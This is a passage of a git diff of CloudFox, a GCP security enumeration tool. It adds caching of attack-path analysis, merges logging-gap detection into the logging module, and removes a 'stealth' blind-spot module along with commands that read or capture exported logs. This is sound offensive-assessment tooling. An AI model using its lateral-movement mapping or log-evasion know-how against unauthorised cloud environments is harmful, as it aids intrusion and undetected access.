lootContent.WriteString(fmt.Sprintf("## %s (%d)\n", resourceType, m.totalByType[resourceType])) + for _, region := range sortedRegions { + for _, resourceID := range m.resourceIDs[resourceType][region] { + lootContent.WriteString(fmt.Sprintf("%s\n", resourceID)) + } + } + lootContent.WriteString("\n") + } + + lootFiles := []internal.LootFile{{ + Name: "inventory-resources", + Contents: lootContent.String(), + }} + + output := InventoryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_INVENTORY_MODULE_NAME) + } +} + +// getSortedRegions returns regions sorted by count, with "global" first +func (m *InventoryModule) getSortedRegions() []string { + var regions []string + for region := range m.regions { + regions = append(regions, region) + } + + // Sort by count descending + sort.Slice(regions, func(i, j int) bool { + // Global always first + if regions[i] == "global" { + return true + } + if regions[j] == "global" { + return false + } + return m.totalByRegion[regions[i]] > m.totalByRegion[regions[j]] + }) + + return regions +} diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index 432c313f..b1bc680e 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -35,8 +35,8 @@ Security Columns: - PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt Resource IAM Columns: -- Resource Role: The IAM role granted ON this key (e.g., roles/cloudkms.cryptoKeyDecrypter) -- Resource Principal: The principal (user/SA/group) who has that role on this key +- IAM Binding Role: The IAM role granted ON this key (e.g., roles/cloudkms.cryptoKeyDecrypter) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this key Attack Surface: - Public decrypt access allows unauthorized data access @@ -277,8 +277,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { // getKeysHeader returns the header for the crypto keys table func (m *KMSModule) getKeysHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Key Name", "Key Ring", "Location", @@ -289,16 +288,15 @@ func (m *KMSModule) getKeysHeader() []string { "Rotation", "Public Encrypt", "Public Decrypt", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } // getKeyRingsHeader returns the header for the key rings table func (m *KMSModule) getKeyRingsHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Key Ring", "Location", "Key Count", @@ -321,38 +319,42 @@ func (m *KMSModule) keysToTableBody(keys []KMSService.CryptoKeyInfo) [][]string protection = "SOFTWARE" } - // Base row data (reused for each IAM binding) - baseRow := []string{ - m.GetProjectName(key.ProjectID), - key.ProjectID, - key.Name, - key.KeyRing, - key.Location, - formatPurpose(key.Purpose), - protection, - key.PrimaryVersion, - key.PrimaryState, - rotation, - shared.BoolToYesNo(key.IsPublicEncrypt), - shared.BoolToYesNo(key.IsPublicDecrypt), - } - // If key has IAM bindings, create one row per binding if len(key.IAMBindings) > 0 { for _, binding := range key.IAMBindings { - row := make([]string, len(baseRow)+2) - copy(row, baseRow) - row[len(baseRow)] = binding.Role - row[len(baseRow)+1] = binding.Member - body = append(body, row) + body = append(body, []string{ + m.GetProjectName(key.ProjectID), + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), + binding.Role, + binding.Member, + }) } } else { // No IAM bindings - single row - row := make([]string, len(baseRow)+2) - copy(row, baseRow) - row[len(baseRow)] = "-" - row[len(baseRow)+1] = "-" - body = append(body, row) + body = append(body, []string{ + m.GetProjectName(key.ProjectID), + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + shared.BoolToYesNo(key.IsPublicEncrypt), + shared.BoolToYesNo(key.IsPublicDecrypt), + "-", + "-", + }) } } return body @@ -364,7 +366,6 @@ func (m *KMSModule) keyRingsToTableBody(keyRings []KMSService.KeyRingInfo) [][]s for _, kr := range keyRings { body = append(body, []string{ m.GetProjectName(kr.ProjectID), - kr.ProjectID, kr.Name, kr.Location, fmt.Sprintf("%d", kr.KeyCount), diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 4a8707a0..b94c6e17 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -91,15 +91,48 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) - // Analyze org and folder level lateral movement paths (runs once for all projects) - m.analyzeOrgFolderLateralPaths(ctx, logger) + var usedCache bool + + // Check if attack path analysis was already run (via --attack-paths flag) + if cache := gcpinternal.GetAttackPathCacheFromContext(ctx); cache != nil && cache.HasRawData() { + if cachedResult, ok := cache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { + logger.InfoM("Using cached attack path analysis results", GCP_LATERALMOVEMENT_MODULE_NAME) + m.loadFromCachedData(cachedResult) + usedCache = true + } + } + + // If no context cache, try loading from disk cache + if !usedCache { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.HasRawData() { + if cachedResult, ok := diskCache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { + logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, projects: %v)", + metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.ProjectsIn), GCP_LATERALMOVEMENT_MODULE_NAME) + m.loadFromCachedData(cachedResult) + usedCache = true + } + } + } + + // If no cached data, run full analysis + if !usedCache { + logger.InfoM("Running lateral movement analysis...", GCP_LATERALMOVEMENT_MODULE_NAME) + + // Analyze org and folder level lateral movement paths (runs once for all projects) + m.analyzeOrgFolderLateralPaths(ctx, logger) - // Process each project - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + + // Consolidate all paths + for _, paths := range m.ProjectPaths { + m.AllPaths = append(m.AllPaths, paths...) + } - // Consolidate all paths - for _, paths := range m.ProjectPaths { - m.AllPaths = append(m.AllPaths, paths...) + // Save to disk cache for future use (run full analysis for all attack types) + // Skip if running under all-checks (consolidated save happens at the end) + m.saveToAttackPathCache(ctx, logger) } // Check results @@ -119,6 +152,72 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log m.writeOutput(ctx, logger) } +// loadFromCachedData loads lateral movement paths from cached attack path data +func (m *LateralMovementModule) loadFromCachedData(data *attackpathservice.CombinedAttackPathData) { + // Filter to only include lateral paths + for _, path := range data.AllPaths { + if path.PathType == "lateral" { + m.AllPaths = append(m.AllPaths, path) + // Also organize by project + if path.ScopeType == "project" && path.ScopeID != "" { + m.ProjectPaths[path.ScopeID] = append(m.ProjectPaths[path.ScopeID], path) + } else if path.ScopeType == "organization" { + m.ProjectPaths["organization"] = append(m.ProjectPaths["organization"], path) + } else if path.ScopeType == "folder" { + m.ProjectPaths["folder"] = append(m.ProjectPaths["folder"], path) + } + } + } +} + +// saveToAttackPathCache saves attack path data to disk cache +func (m *LateralMovementModule) saveToAttackPathCache(ctx context.Context, logger internal.Logger) { + // Skip saving if running under all-checks (consolidated save happens at the end) + if gcpinternal.IsAllChecksMode(ctx) { + logger.InfoM("Skipping individual cache save (all-checks mode)", GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + // Run full analysis (all types) so we can cache for other modules + svc := attackpathservice.New() + fullResult, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "all") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not run full attack path analysis for caching: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + cache := gcpinternal.NewAttackPathCache() + + // Populate cache with paths from all scopes + var pathInfos []gcpinternal.AttackPathInfo + for _, path := range fullResult.AllPaths { + pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + Method: path.Method, + PathType: gcpinternal.AttackPathType(path.PathType), + Category: path.Category, + RiskLevel: path.RiskLevel, + Target: path.TargetResource, + Permissions: path.Permissions, + ScopeType: path.ScopeType, + ScopeID: path.ScopeID, + }) + } + cache.PopulateFromPaths(pathInfos) + cache.SetRawData(fullResult) + + // Save to disk + err = gcpinternal.SaveAttackPathCacheToFile(cache, m.ProjectIDs, m.OutputDirectory, m.Account, "1.0") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not save attack path cache: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + } else { + privesc, exfil, lateral := cache.GetStats() + logger.InfoM(fmt.Sprintf("Saved attack path cache to disk (%d privesc, %d exfil, %d lateral)", + privesc, exfil, lateral), GCP_LATERALMOVEMENT_MODULE_NAME) + } +} + // analyzeOrgFolderLateralPaths analyzes organization and folder level IAM for lateral movement permissions func (m *LateralMovementModule) analyzeOrgFolderLateralPaths(ctx context.Context, logger internal.Logger) { attackSvc := attackpathservice.New() @@ -755,13 +854,14 @@ func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal func (m *LateralMovementModule) getHeader() []string { return []string{ - "Scope Type", - "Scope Name", - "Principal", + "Project", + "Source", "Principal Type", + "Principal", "Method", "Target Resource", "Category", + "Binding Scope", "Permissions", } } @@ -774,14 +874,25 @@ func (m *LateralMovementModule) pathsToTableBody(paths []attackpathservice.Attac scopeName = path.ScopeID } + // Format binding scope (where the IAM binding is defined) + bindingScope := "Project" + if path.ScopeType == "organization" { + bindingScope = "Organization" + } else if path.ScopeType == "folder" { + bindingScope = "Folder" + } else if path.ScopeType == "resource" { + bindingScope = "Resource" + } + body = append(body, []string{ - path.ScopeType, scopeName, - path.Principal, + path.ScopeType, path.PrincipalType, + path.Principal, path.Method, path.TargetResource, path.Category, + bindingScope, strings.Join(path.Permissions, ", "), }) } diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index 9e9560ad..5929700e 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -266,15 +266,15 @@ func (m *LoadBalancersModule) generateLoadBalancerDiagram() string { } func (m *LoadBalancersModule) getLBHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} + return []string{"Project", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} } func (m *LoadBalancersModule) getSSLHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Min TLS Version", "Profile", "Custom Features"} + return []string{"Project", "Name", "Min TLS Version", "Profile", "Custom Features"} } func (m *LoadBalancersModule) getBackendHeader() []string { - return []string{"Project Name", "Project ID", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} + return []string{"Project", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} } func (m *LoadBalancersModule) lbsToTableBody(lbs []loadbalancerservice.LoadBalancerInfo) [][]string { @@ -290,7 +290,6 @@ func (m *LoadBalancersModule) lbsToTableBody(lbs []loadbalancerservice.LoadBalan } body = append(body, []string{ m.GetProjectName(lb.ProjectID), - lb.ProjectID, lb.Name, lb.Type, lb.Scheme, @@ -313,7 +312,6 @@ func (m *LoadBalancersModule) sslPoliciesToTableBody(policies []loadbalancerserv } body = append(body, []string{ m.GetProjectName(policy.ProjectID), - policy.ProjectID, policy.Name, policy.MinTLSVersion, policy.Profile, @@ -344,7 +342,6 @@ func (m *LoadBalancersModule) backendServicesToTableBody(services []loadbalancer } body = append(body, []string{ m.GetProjectName(be.ProjectID), - be.ProjectID, be.Name, be.Protocol, fmt.Sprintf("%d", be.Port), diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index aa8f9571..16117bea 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -15,9 +15,9 @@ import ( var GCPLoggingCommand = &cobra.Command{ Use: globals.GCP_LOGGING_MODULE_NAME, - Aliases: []string{"logs", "sinks", "log-sinks"}, - Short: "Enumerate Cloud Logging sinks and metrics with security analysis", - Long: `Enumerate Cloud Logging sinks and log-based metrics across projects. + Aliases: []string{"logs", "sinks", "log-sinks", "logging-gaps"}, + Short: "Enumerate Cloud Logging configuration including sinks, metrics, and logging gaps", + Long: `Enumerate Cloud Logging configuration across projects including sinks, metrics, and logging gaps. Features: - Lists all logging sinks (log exports) @@ -25,19 +25,26 @@ Features: - Identifies cross-project log exports - Shows sink filters and exclusions - Lists log-based metrics for alerting -- Generates gcloud commands for further analysis +- Identifies resources with missing or incomplete logging +- Generates gcloud commands for logging enumeration -Security Columns: +Log Sinks: - Destination: Where logs are exported (bucket, dataset, topic) - CrossProject: Whether logs are exported to another project - WriterIdentity: Service account used for export - Filter: What logs are included/excluded -Attack Surface: +Logging Gaps (resources with incomplete logging): +- Cloud Storage buckets without access logging +- VPC subnets without flow logs +- GKE clusters with incomplete logging configuration +- Cloud SQL instances without query/connection logging + +Security Considerations: - Cross-project exports may leak logs to external projects - Sink writer identity may have excessive permissions - Disabled sinks may indicate log evasion -- Missing sinks may indicate lack of log retention`, +- Missing logging on resources creates detection blind spots`, Run: runGCPLoggingCommand, } @@ -47,8 +54,9 @@ Attack Surface: type LoggingModule struct { gcpinternal.BaseGCPModule - ProjectSinks map[string][]LoggingService.SinkInfo // projectID -> sinks - ProjectMetrics map[string][]LoggingService.MetricInfo // projectID -> metrics + ProjectSinks map[string][]LoggingService.SinkInfo // projectID -> sinks + ProjectMetrics map[string][]LoggingService.MetricInfo // projectID -> metrics + ProjectGaps map[string][]LoggingService.LoggingGap // projectID -> logging gaps LootMap map[string]map[string]*internal.LootFile mu sync.Mutex } @@ -77,6 +85,7 @@ func runGCPLoggingCommand(cmd *cobra.Command, args []string) { BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectSinks: make(map[string][]LoggingService.SinkInfo), ProjectMetrics: make(map[string][]LoggingService.MetricInfo), + ProjectGaps: make(map[string][]LoggingService.LoggingGap), LootMap: make(map[string]map[string]*internal.LootFile), } @@ -91,9 +100,10 @@ func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { allSinks := m.getAllSinks() allMetrics := m.getAllMetrics() + allGaps := m.getAllGaps() - if len(allSinks) == 0 && len(allMetrics) == 0 { - logger.InfoM("No logging sinks or metrics found", globals.GCP_LOGGING_MODULE_NAME) + if len(allSinks) == 0 && len(allMetrics) == 0 && len(allGaps) == 0 { + logger.InfoM("No logging configuration found", globals.GCP_LOGGING_MODULE_NAME) return } @@ -109,7 +119,7 @@ func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { } } - msg := fmt.Sprintf("Found %d sink(s), %d metric(s)", len(allSinks), len(allMetrics)) + msg := fmt.Sprintf("Found %d sink(s), %d metric(s), %d logging gap(s)", len(allSinks), len(allMetrics), len(allGaps)) if crossProjectCount > 0 { msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) } @@ -139,6 +149,15 @@ func (m *LoggingModule) getAllMetrics() []LoggingService.MetricInfo { return all } +// getAllGaps returns all logging gaps from all projects +func (m *LoggingModule) getAllGaps() []LoggingService.LoggingGap { + var all []LoggingService.LoggingGap + for _, gaps := range m.ProjectGaps { + all = append(all, gaps...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -151,6 +170,7 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo var projectSinks []LoggingService.SinkInfo var projectMetrics []LoggingService.MetricInfo + var projectGaps []LoggingService.LoggingGap // Get sinks sinks, err := ls.Sinks(projectID) @@ -172,154 +192,123 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo projectMetrics = append(projectMetrics, metrics...) } + // Get logging gaps + gaps, err := ls.LoggingGaps(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) + } + } else { + projectGaps = append(projectGaps, gaps...) + } + // Thread-safe store per-project m.mu.Lock() m.ProjectSinks[projectID] = projectSinks m.ProjectMetrics[projectID] = projectMetrics + m.ProjectGaps[projectID] = projectGaps // Initialize loot for this project if m.LootMap[projectID] == nil { m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["sinks-commands"] = &internal.LootFile{ - Name: "sinks-commands", - Contents: "# Cloud Logging Sinks Commands\n# Generated by CloudFox\n\n", - } - m.LootMap[projectID]["sinks-cross-project"] = &internal.LootFile{ - Name: "sinks-cross-project", - Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", - } - m.LootMap[projectID]["sinks-writer-identities"] = &internal.LootFile{ - Name: "sinks-writer-identities", - Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", - } - m.LootMap[projectID]["metrics-commands"] = &internal.LootFile{ - Name: "metrics-commands", - Contents: "# Cloud Logging Metrics Commands\n# Generated by CloudFox\n\n", + m.LootMap[projectID]["logging-commands"] = &internal.LootFile{ + Name: "logging-commands", + Contents: "# Cloud Logging Enumeration Commands\n# Generated by CloudFox\n\n", } } - for _, sink := range projectSinks { - m.addSinkToLoot(projectID, sink) - } - for _, metric := range projectMetrics { - m.addMetricToLoot(projectID, metric) - } + m.generateLootCommands(projectID, projectSinks, projectMetrics, projectGaps) m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s) in project %s", len(projectSinks), len(projectMetrics), projectID), globals.GCP_LOGGING_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s), %d gap(s) in project %s", len(projectSinks), len(projectMetrics), len(projectGaps), projectID), globals.GCP_LOGGING_MODULE_NAME) } } // ------------------------------ // Loot File Management // ------------------------------ -func (m *LoggingModule) addSinkToLoot(projectID string, sink LoggingService.SinkInfo) { - lootFile := m.LootMap[projectID]["sinks-commands"] +func (m *LoggingModule) generateLootCommands(projectID string, sinks []LoggingService.SinkInfo, metrics []LoggingService.MetricInfo, gaps []LoggingService.LoggingGap) { + lootFile := m.LootMap[projectID]["logging-commands"] if lootFile == nil { return } - // Sinks commands file - lootFile.Contents += fmt.Sprintf( - "# Sink: %s (Project: %s)\n"+ - "# Destination: %s (%s)\n"+ - "gcloud logging sinks describe %s --project=%s\n", - sink.Name, sink.ProjectID, - sink.DestinationType, getDestinationName(sink), - sink.Name, sink.ProjectID, - ) + // Project-level logging enumeration + lootFile.Contents += fmt.Sprintf("## Project: %s\n\n", projectID) - // Add destination-specific commands - switch sink.DestinationType { - case "storage": - if sink.DestinationBucket != "" { - lootFile.Contents += fmt.Sprintf( - "gsutil ls gs://%s/\n"+ - "gsutil cat gs://%s/**/*.json 2>/dev/null | head -100\n", - sink.DestinationBucket, sink.DestinationBucket, - ) - } - case "bigquery": - if sink.DestinationDataset != "" { - destProject := sink.DestinationProject - if destProject == "" { - destProject = sink.ProjectID + // Sinks enumeration commands + lootFile.Contents += "# ===== Log Sinks =====\n" + lootFile.Contents += fmt.Sprintf("gcloud logging sinks list --project=%s\n\n", projectID) + + for _, sink := range sinks { + lootFile.Contents += fmt.Sprintf("# Sink: %s (%s)\n", sink.Name, sink.DestinationType) + lootFile.Contents += fmt.Sprintf("gcloud logging sinks describe %s --project=%s\n", sink.Name, projectID) + + // Add destination-specific enumeration commands + switch sink.DestinationType { + case "storage": + if sink.DestinationBucket != "" { + lootFile.Contents += fmt.Sprintf("# Check bucket logging destination:\ngsutil ls gs://%s/\n", sink.DestinationBucket) } - lootFile.Contents += fmt.Sprintf( - "bq ls %s:%s\n"+ - "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n", - destProject, sink.DestinationDataset, - destProject, sink.DestinationDataset, - ) - } - case "pubsub": - if sink.DestinationTopic != "" { - destProject := sink.DestinationProject - if destProject == "" { - destProject = sink.ProjectID + case "bigquery": + if sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = projectID + } + lootFile.Contents += fmt.Sprintf("# Check BigQuery logging destination:\nbq ls %s:%s\n", destProject, sink.DestinationDataset) + } + case "pubsub": + if sink.DestinationTopic != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = projectID + } + lootFile.Contents += fmt.Sprintf("# Check Pub/Sub logging destination:\ngcloud pubsub topics describe %s --project=%s\n", sink.DestinationTopic, destProject) } - lootFile.Contents += fmt.Sprintf( - "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ - "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n", - sink.DestinationTopic, destProject, destProject, - ) } - } - lootFile.Contents += "\n" - // Cross-project exports - if sink.IsCrossProject { - crossProjectLoot := m.LootMap[projectID]["sinks-cross-project"] - if crossProjectLoot != nil { - filter := sink.Filter - if filter == "" { - filter = "(no filter - all logs)" - } - crossProjectLoot.Contents += fmt.Sprintf( - "# Sink: %s\n"+ - "# Source Project: %s\n"+ - "# Destination Project: %s\n"+ - "# Destination Type: %s\n"+ - "# Destination: %s\n"+ - "# Filter: %s\n"+ - "# Writer Identity: %s\n\n", - sink.Name, - sink.ProjectID, - sink.DestinationProject, - sink.DestinationType, - sink.Destination, - filter, - sink.WriterIdentity, - ) + if sink.IsCrossProject { + lootFile.Contents += fmt.Sprintf("# NOTE: Cross-project export to %s\n", sink.DestinationProject) } + lootFile.Contents += "\n" } - // Writer identities - if sink.WriterIdentity != "" { - writerLoot := m.LootMap[projectID]["sinks-writer-identities"] - if writerLoot != nil { - writerLoot.Contents += fmt.Sprintf( - "# Sink: %s -> %s (%s)\n"+ - "%s\n\n", - sink.Name, sink.DestinationType, getDestinationName(sink), - sink.WriterIdentity, - ) + // Metrics enumeration commands + if len(metrics) > 0 { + lootFile.Contents += "# ===== Log-based Metrics =====\n" + lootFile.Contents += fmt.Sprintf("gcloud logging metrics list --project=%s\n\n", projectID) + + for _, metric := range metrics { + lootFile.Contents += fmt.Sprintf("# Metric: %s\n", metric.Name) + lootFile.Contents += fmt.Sprintf("gcloud logging metrics describe %s --project=%s\n\n", metric.Name, projectID) } } -} -func (m *LoggingModule) addMetricToLoot(projectID string, metric LoggingService.MetricInfo) { - lootFile := m.LootMap[projectID]["metrics-commands"] - if lootFile == nil { - return + // Logging gaps enumeration commands + if len(gaps) > 0 { + lootFile.Contents += "# ===== Logging Configuration Gaps =====\n" + lootFile.Contents += "# Commands to verify logging configuration on resources with gaps\n\n" + + for _, gap := range gaps { + lootFile.Contents += fmt.Sprintf("# %s: %s (%s) - %s\n", gap.ResourceType, gap.ResourceName, gap.Location, gap.LoggingStatus) + lootFile.Contents += fmt.Sprintf("# Missing: %s\n", strings.Join(gap.MissingLogs, ", ")) + + switch gap.ResourceType { + case "bucket": + lootFile.Contents += fmt.Sprintf("gsutil logging get gs://%s\n", gap.ResourceName) + case "subnet": + lootFile.Contents += fmt.Sprintf("gcloud compute networks subnets describe %s --region=%s --project=%s --format='value(logConfig)'\n", gap.ResourceName, gap.Location, projectID) + case "gke": + lootFile.Contents += fmt.Sprintf("gcloud container clusters describe %s --location=%s --project=%s --format='value(loggingService,loggingConfig)'\n", gap.ResourceName, gap.Location, projectID) + case "cloudsql": + lootFile.Contents += fmt.Sprintf("gcloud sql instances describe %s --project=%s --format='value(settings.databaseFlags)'\n", gap.ResourceName, projectID) + } + lootFile.Contents += "\n" + } } - lootFile.Contents += fmt.Sprintf( - "# Metric: %s (Project: %s)\n"+ - "gcloud logging metrics describe %s --project=%s\n\n", - metric.Name, metric.ProjectID, - metric.Name, metric.ProjectID, - ) } // ------------------------------ @@ -360,6 +349,18 @@ func (m *LoggingModule) getMetricsHeader() []string { } } +// getGapsHeader returns the header for logging gaps table +func (m *LoggingModule) getGapsHeader() []string { + return []string{ + "Project", + "Type", + "Resource", + "Location", + "Status", + "Missing Logs", + } +} + // sinksToTableBody converts sinks to table body rows func (m *LoggingModule) sinksToTableBody(sinks []LoggingService.SinkInfo) [][]string { var body [][]string @@ -440,6 +441,29 @@ func (m *LoggingModule) metricsToTableBody(metrics []LoggingService.MetricInfo) return body } +// gapsToTableBody converts logging gaps to table body rows +func (m *LoggingModule) gapsToTableBody(gaps []LoggingService.LoggingGap) [][]string { + var body [][]string + for _, gap := range gaps { + missingLogs := strings.Join(gap.MissingLogs, "; ") + + location := gap.Location + if location == "" { + location = "-" + } + + body = append(body, []string{ + m.GetProjectName(gap.ProjectID), + gap.ResourceType, + gap.ResourceName, + location, + gap.LoggingStatus, + missingLogs, + }) + } + return body +} + // buildTablesForProject builds table files for a project func (m *LoggingModule) buildTablesForProject(projectID string) []internal.TableFile { var tableFiles []internal.TableFile @@ -460,6 +484,14 @@ func (m *LoggingModule) buildTablesForProject(projectID string) []internal.Table }) } + if gaps, ok := m.ProjectGaps[projectID]; ok && len(gaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-gaps", + Header: m.getGapsHeader(), + Body: m.gapsToTableBody(gaps), + }) + } + return tableFiles } @@ -470,7 +502,19 @@ func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger inte ProjectLevelData: make(map[string]internal.CloudfoxOutput), } + // Collect all projects that have data + projectsWithData := make(map[string]bool) for projectID := range m.ProjectSinks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectMetrics { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectGaps { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { tableFiles := m.buildTablesForProject(projectID) // Collect loot for this project @@ -486,24 +530,6 @@ func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger inte outputData.ProjectLevelData[projectID] = LoggingOutput{Table: tableFiles, Loot: lootFiles} } - // Also add projects that only have metrics - for projectID := range m.ProjectMetrics { - if _, exists := outputData.ProjectLevelData[projectID]; !exists { - tableFiles := m.buildTablesForProject(projectID) - - var lootFiles []internal.LootFile - if projectLoot, ok := m.LootMap[projectID]; ok { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - - outputData.ProjectLevelData[projectID] = LoggingOutput{Table: tableFiles, Loot: lootFiles} - } - } - pathBuilder := m.BuildPathBuilder() err := internal.HandleHierarchicalOutputSmart( @@ -524,6 +550,7 @@ func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger inte func (m *LoggingModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { allSinks := m.getAllSinks() allMetrics := m.getAllMetrics() + allGaps := m.getAllGaps() // Build table files tableFiles := []internal.TableFile{} @@ -544,6 +571,14 @@ func (m *LoggingModule) writeFlatOutput(ctx context.Context, logger internal.Log }) } + if len(allGaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-gaps", + Header: m.getGapsHeader(), + Body: m.gapsToTableBody(allGaps), + }) + } + // Collect all loot files var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go deleted file mode 100644 index ec37013b..00000000 --- a/gcp/commands/logginggaps.go +++ /dev/null @@ -1,326 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - - logginggapsservice "github.com/BishopFox/cloudfox/gcp/services/loggingGapsService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPLoggingGapsCommand = &cobra.Command{ - Use: globals.GCP_LOGGINGGAPS_MODULE_NAME, - Aliases: []string{"log-gaps", "stealth", "blind-spots"}, - Short: "Find resources with missing or incomplete logging", - Long: `Identify logging gaps across GCP resources for stealth assessment. - -This module helps identify resources where actions may not be properly logged, -which is valuable for understanding detection blind spots. - -Resources Checked: -- Cloud Storage buckets (access logging) -- VPC subnets (flow logs) -- GKE clusters (workload and system logging) -- Cloud SQL instances (query and connection logging) -- Log sinks and exclusions (export gaps) -- Project-level audit logging configuration - -Output: -- Resources with disabled or partial logging -- Stealth value rating (CRITICAL, HIGH, MEDIUM, LOW) -- Specific missing log types -- Recommendations for defenders -- Commands for testing detection gaps - -Stealth Value Ratings: -- CRITICAL: No logging, actions completely invisible -- HIGH: Significant gaps enabling undetected activity -- MEDIUM: Some logging present but incomplete -- LOW: Minor gaps with limited stealth value`, - Run: runGCPLoggingGapsCommand, -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type LoggingGapsModule struct { - gcpinternal.BaseGCPModule - - ProjectGaps map[string][]logginggapsservice.LoggingGap // projectID -> gaps - ProjectAuditConfigs map[string]*logginggapsservice.AuditLogConfig // projectID -> audit config - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type LoggingGapsOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o LoggingGapsOutput) TableFiles() []internal.TableFile { return o.Table } -func 